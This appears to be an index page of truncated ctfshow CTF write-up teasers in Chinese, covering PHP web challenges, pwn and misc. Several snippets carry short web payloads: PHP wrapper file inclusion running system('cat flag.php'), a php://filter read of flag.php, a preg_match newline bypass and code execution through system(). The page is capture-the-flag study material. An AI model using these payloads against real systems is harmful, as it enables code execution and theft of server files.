> > 104杯 pwn_happy_unlink admin # coding:utf-8 # w22_Template from pwn import * import os impo...
1024杯 web签到
> > 1024杯 web签到 admin ?f=phpinfo 可以看到ctfshow_1024 support ,调用即可
web入门133
> > web入门133 Firebasky https://blog.csdn.net/qq_46091464/article/details/109095382
php特性-web91
> > php特性-web91 dust payload:?cmd=%0aphp preg_match('/php$/im', $a)) 多行匹配 (preg_match('/php$/i...
php特性-web90
> > php特性-web90 dust 科学计数法 payload:?num=4476.0e1 十六进制写法 ?num=0x117c 八进制写法: ?num=010574 其它姿势,欢迎...
web入门-web79
> > web入门-web79 dust /?file=pHp://input postdata: <?php system('cat flag.php'); ?> str_r...
web入门-web78
> > web入门-web78 dust payload: ?file=php://filter/read=convert.base64-encode/resource=flag.php ...
月饼杯WP
> > 月饼杯WP emmmm @[toc] Misc 附加misc_问青天 下载附件解压得到一个welcome.gif。 直接foremost工具分离得到一个加密了的zip文件。然后一开...
CTFSHOW内部赛 杂项4_送你一张电影票
> > CTFSHOW内部赛 杂项4_送你一张电影票 hdxw 可惜一张票也没送出去。 这是什么电影.jpg,图片详细信息“来源-作者-加尔德·加兹特鲁·乌鲁蒂亚”,直接搜这个人就能得到电...
ctfshow web入门 命令执行+web90-97
> > ctfshow web入门 命令执行+web90-97 hdxw 命令执行通关playload 实际上是代码执行,用代码读目录和文件内容 参考:https://www.php.ne...
WEB入门100+以后题目笔记
> > WEB入门100+以后题目笔记 hdxw web100 v1是数字,v3有分号,v2没有分号,随意代码执行 ?v1=1&v2=system("cat%20c*")?>...
【月饼杯】re3 wp
> > 【月饼杯】re3 wp Lazzaro 详见: https://lazzzaro.github.io/2020/09/26/match-CTFshow-月饼杯/#re3-若无月 赛...
863